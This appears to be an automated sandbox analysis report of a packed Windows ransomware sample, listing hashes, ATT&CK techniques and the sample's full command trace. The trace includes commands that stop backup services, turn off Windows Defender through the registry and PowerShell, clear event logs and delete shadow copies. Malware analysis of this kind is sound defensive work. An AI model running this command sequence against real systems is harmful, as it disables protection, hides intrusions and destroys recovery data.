25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5

General

Target

da13022097518d123a91a3958be326da.exe
Size

884KB
MD5

da13022097518d123a91a3958be326da
SHA1

24a71ab462594d5a159bbf176588af951aba1381
SHA256

25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
SHA512

a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
SSDEEP

12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw

Score

10^/10

evasion ransomware trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

1028 wevtutil.exe
2056 wevtutil.exe
4680 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

pid	process
1028	wevtutil.exe
2056	wevtutil.exe
4680	wevtutil.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3904-0-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-1-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-2-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-3-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-4-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-5-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-8-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-9-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-10-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-13-0x0000000000E70000-0x0000000001182000-memory.dmp	upx
behavioral2/memory/3904-67-0x0000000000E70000-0x0000000001182000-memory.dmp	upx

Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1976 sc.exe
1516 sc.exe
4232 sc.exe
3672 sc.exe
1760 sc.exe
3288 sc.exe
1912 sc.exe
4804 sc.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2040 powershell.exe
2040 powershell.exe
2040 powershell.exe

pid	process
1976	sc.exe
1516	sc.exe
4232	sc.exe
3672	sc.exe
1760	sc.exe
3288	sc.exe
1912	sc.exe
4804	sc.exe

pid	process
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	2056	wevtutil.exe
Token: SeBackupPrivilege	2056	wevtutil.exe
Token: SeSecurityPrivilege	4680	wevtutil.exe
Token: SeBackupPrivilege	4680	wevtutil.exe
Token: SeSecurityPrivilege	1028	wevtutil.exe
Token: SeBackupPrivilege	1028	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	1216	wmic.exe
Token: SeSecurityPrivilege	1216	wmic.exe
Token: SeTakeOwnershipPrivilege	1216	wmic.exe
Token: SeLoadDriverPrivilege	1216	wmic.exe
Token: SeSystemProfilePrivilege	1216	wmic.exe
Token: SeSystemtimePrivilege	1216	wmic.exe
Token: SeProfSingleProcessPrivilege	1216	wmic.exe
Token: SeIncBasePriorityPrivilege	1216	wmic.exe
Token: SeCreatePagefilePrivilege	1216	wmic.exe
Token: SeBackupPrivilege	1216	wmic.exe
Token: SeRestorePrivilege	1216	wmic.exe
Token: SeShutdownPrivilege	1216	wmic.exe
Token: SeDebugPrivilege	1216	wmic.exe
Token: SeSystemEnvironmentPrivilege	1216	wmic.exe
Token: SeRemoteShutdownPrivilege	1216	wmic.exe
Token: SeUndockPrivilege	1216	wmic.exe
Token: SeManageVolumePrivilege	1216	wmic.exe
Token: 33	1216	wmic.exe
Token: 34	1216	wmic.exe
Token: 35	1216	wmic.exe
Token: 36	1216	wmic.exe
Token: SeIncreaseQuotaPrivilege	1224	wmic.exe
Token: SeSecurityPrivilege	1224	wmic.exe
Token: SeTakeOwnershipPrivilege	1224	wmic.exe
Token: SeLoadDriverPrivilege	1224	wmic.exe
Token: SeSystemProfilePrivilege	1224	wmic.exe
Token: SeSystemtimePrivilege	1224	wmic.exe
Token: SeProfSingleProcessPrivilege	1224	wmic.exe
Token: SeIncBasePriorityPrivilege	1224	wmic.exe
Token: SeCreatePagefilePrivilege	1224	wmic.exe
Token: SeBackupPrivilege	1224	wmic.exe
Token: SeRestorePrivilege	1224	wmic.exe
Token: SeShutdownPrivilege	1224	wmic.exe
Token: SeDebugPrivilege	1224	wmic.exe
Token: SeSystemEnvironmentPrivilege	1224	wmic.exe
Token: SeRemoteShutdownPrivilege	1224	wmic.exe
Token: SeUndockPrivilege	1224	wmic.exe
Token: SeManageVolumePrivilege	1224	wmic.exe
Token: 33	1224	wmic.exe
Token: 34	1224	wmic.exe
Token: 35	1224	wmic.exe
Token: 36	1224	wmic.exe
Token: SeIncreaseQuotaPrivilege	1224	wmic.exe
Token: SeSecurityPrivilege	1224	wmic.exe
Token: SeTakeOwnershipPrivilege	1224	wmic.exe
Token: SeLoadDriverPrivilege	1224	wmic.exe
Token: SeSystemProfilePrivilege	1224	wmic.exe
Token: SeSystemtimePrivilege	1224	wmic.exe
Token: SeProfSingleProcessPrivilege	1224	wmic.exe
Token: SeIncBasePriorityPrivilege	1224	wmic.exe
Token: SeCreatePagefilePrivilege	1224	wmic.exe
Token: SeBackupPrivilege	1224	wmic.exe
Token: SeRestorePrivilege	1224	wmic.exe
Token: SeShutdownPrivilege	1224	wmic.exe
Token: SeDebugPrivilege	1224	wmic.exe
Token: SeSystemEnvironmentPrivilege	1224	wmic.exe
Token: SeRemoteShutdownPrivilege	1224	wmic.exe
Token: SeUndockPrivilege	1224	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

da13022097518d123a91a3958be326da.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3904 wrote to memory of 1740	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 1740	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 1740	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 1740 wrote to memory of 1392	1740	net.exe	net1.exe
PID 1740 wrote to memory of 1392	1740	net.exe	net1.exe
PID 1740 wrote to memory of 1392	1740	net.exe	net1.exe
PID 3904 wrote to memory of 860	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 860	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 860	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 860 wrote to memory of 232	860	net.exe	net1.exe
PID 860 wrote to memory of 232	860	net.exe	net1.exe
PID 860 wrote to memory of 232	860	net.exe	net1.exe
PID 3904 wrote to memory of 4176	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 4176	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 4176	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 4176 wrote to memory of 524	4176	net.exe	net1.exe
PID 4176 wrote to memory of 524	4176	net.exe	net1.exe
PID 4176 wrote to memory of 524	4176	net.exe	net1.exe
PID 3904 wrote to memory of 4600	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 4600	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 4600	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 4600 wrote to memory of 4320	4600	net.exe	net1.exe
PID 4600 wrote to memory of 4320	4600	net.exe	net1.exe
PID 4600 wrote to memory of 4320	4600	net.exe	net1.exe
PID 3904 wrote to memory of 1580	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 1580	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 1580	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 1580 wrote to memory of 3544	1580	net.exe	net1.exe
PID 1580 wrote to memory of 3544	1580	net.exe	net1.exe
PID 1580 wrote to memory of 3544	1580	net.exe	net1.exe
PID 3904 wrote to memory of 5064	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 5064	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 5064	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 5064 wrote to memory of 4912	5064	net.exe	net1.exe
PID 5064 wrote to memory of 4912	5064	net.exe	net1.exe
PID 5064 wrote to memory of 4912	5064	net.exe	net1.exe
PID 3904 wrote to memory of 2888	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 2888	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 2888	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 2888 wrote to memory of 2040	2888	net.exe	net1.exe
PID 2888 wrote to memory of 2040	2888	net.exe	net1.exe
PID 2888 wrote to memory of 2040	2888	net.exe	net1.exe
PID 3904 wrote to memory of 4592	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 4592	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 3904 wrote to memory of 4592	3904	da13022097518d123a91a3958be326da.exe	net.exe
PID 4592 wrote to memory of 2116	4592	net.exe	net1.exe
PID 4592 wrote to memory of 2116	4592	net.exe	net1.exe
PID 4592 wrote to memory of 2116	4592	net.exe	net1.exe
PID 3904 wrote to memory of 4804	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 4804	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 4804	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 1976	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 1976	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 1976	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 1516	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 1516	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 1516	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 4232	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 4232	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 4232	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 3672	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 3672	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 3672	3904	da13022097518d123a91a3958be326da.exe	sc.exe
PID 3904 wrote to memory of 1760	3904	da13022097518d123a91a3958be326da.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\da13022097518d123a91a3958be326da.exe
"C:\Users\Admin\AppData\Local\Temp\da13022097518d123a91a3958be326da.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
3⤵
PID:1392

C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
3⤵
PID:232

C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
3⤵
PID:524

C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
3⤵
PID:4320

C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
3⤵
PID:3544

C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:5064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
3⤵
PID:4912

C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
3⤵
PID:2040

C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_1dc94" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1dc94" /y
3⤵
PID:2116

C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
2⤵
- Launches sc.exe
PID:4804

C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
2⤵
- Launches sc.exe
PID:1976

C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
2⤵
- Launches sc.exe
PID:1516

C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
2⤵
- Launches sc.exe
PID:4232

C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
2⤵
- Launches sc.exe
PID:3672

C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
2⤵
- Launches sc.exe
PID:1760

C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
2⤵
- Launches sc.exe
PID:3288

C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_1dc94" start= disabled
2⤵
- Launches sc.exe
PID:1912

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
2⤵
PID:4840

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:3924

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2⤵
PID:3408

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2⤵
PID:3892

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2228

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3256

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2572

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:324

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2520

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:5084

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2⤵
PID:4604

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2⤵
PID:3264

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
2⤵
PID:3600

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:3984

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2⤵
PID:2744

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2⤵
PID:4020

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2⤵
PID:1940

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2⤵
PID:4772

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2⤵
PID:2680

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
2⤵
PID:4308

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
2⤵
PID:4320

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
2⤵
PID:4756

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:3564

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1020

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1856

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1952

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4724

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
2⤵
- Modifies security service
PID:972

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2436

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1028

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2⤵
PID:3248

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:3380

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2040

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
PID:1600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4004 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:4304

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Privilege Escalation

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

Disable or Modify Tools

1

T1562.001

Indicator Removal

2

T1070

File Deletion

1

T1070.004

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

1

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
78b2e38215fb307930d45d04b19da219

SHA1
53da7024a9da9604600f4695e5d00c1254bb3a22

SHA256
6aa0a1eef50fef64c88b4878e9552724180779b6f1361d03f27ab03a51326613

SHA512
e0b61fd83aa686fd6f5146b9b593b546cbec5c4064a337bd89dc8238b809f04de75b4951baef7248e143bcf022a41b9c4f1910eaa0548618c9dab97224cc2995

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3ld0qqu.lkl.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1600-77-0x0000000005610000-0x0000000005964000-memory.dmp

Filesize
3.3MB

Download
memory/1600-71-0x00000000021F0000-0x0000000002200000-memory.dmp

Filesize
64KB

Download
memory/1600-70-0x00000000021F0000-0x0000000002200000-memory.dmp

Filesize
64KB

Download
memory/1600-69-0x0000000073D50000-0x0000000074500000-memory.dmp

Filesize
7.7MB

Download
memory/2040-35-0x0000000006490000-0x00000000064DC000-memory.dmp

Filesize
304KB

Download
memory/2040-40-0x0000000006A20000-0x0000000006A52000-memory.dmp

Filesize
200KB

Download
memory/2040-12-0x0000000073D50000-0x0000000074500000-memory.dmp

Filesize
7.7MB

Download
memory/2040-66-0x0000000073D50000-0x0000000074500000-memory.dmp

Filesize
7.7MB

Download
memory/2040-14-0x0000000004FA0000-0x0000000004FB0000-memory.dmp

Filesize
64KB

Download
memory/2040-15-0x0000000002A80000-0x0000000002AB6000-memory.dmp

Filesize
216KB

Download
memory/2040-16-0x0000000004FA0000-0x0000000004FB0000-memory.dmp

Filesize
64KB

Download
memory/2040-18-0x00000000055E0000-0x0000000005C08000-memory.dmp

Filesize
6.2MB

Download
memory/2040-20-0x0000000073D50000-0x0000000074500000-memory.dmp

Filesize
7.7MB

Download
memory/2040-21-0x0000000005550000-0x0000000005572000-memory.dmp

Filesize
136KB

Download
memory/2040-22-0x0000000005C80000-0x0000000005CE6000-memory.dmp

Filesize
408KB

Download
memory/2040-23-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/2040-63-0x0000000007A90000-0x0000000007A98000-memory.dmp

Filesize
32KB

Download
memory/2040-33-0x0000000005F20000-0x0000000006274000-memory.dmp

Filesize
3.3MB

Download
memory/2040-34-0x00000000063C0000-0x00000000063DE000-memory.dmp

Filesize
120KB

Download
memory/2040-62-0x0000000007AA0000-0x0000000007ABA000-memory.dmp

Filesize
104KB

Download
memory/2040-37-0x0000000004FA0000-0x0000000004FB0000-memory.dmp

Filesize
64KB

Download
memory/2040-38-0x0000000004FA0000-0x0000000004FB0000-memory.dmp

Filesize
64KB

Download
memory/2040-39-0x000000007F9C0000-0x000000007F9D0000-memory.dmp

Filesize
64KB

Download
memory/2040-61-0x00000000079B0000-0x00000000079C4000-memory.dmp

Filesize
80KB

Download
memory/2040-41-0x0000000074840000-0x000000007488C000-memory.dmp

Filesize
304KB

Download
memory/2040-51-0x0000000006A00000-0x0000000006A1E000-memory.dmp

Filesize
120KB

Download
memory/2040-52-0x0000000007650000-0x00000000076F3000-memory.dmp

Filesize
652KB

Download
memory/2040-53-0x0000000007E00000-0x000000000847A000-memory.dmp

Filesize
6.5MB

Download
memory/2040-54-0x0000000007780000-0x000000000779A000-memory.dmp

Filesize
104KB

Download
memory/2040-55-0x00000000077E0000-0x00000000077EA000-memory.dmp

Filesize
40KB

Download
memory/2040-57-0x00000000079D0000-0x0000000007A66000-memory.dmp

Filesize
600KB

Download
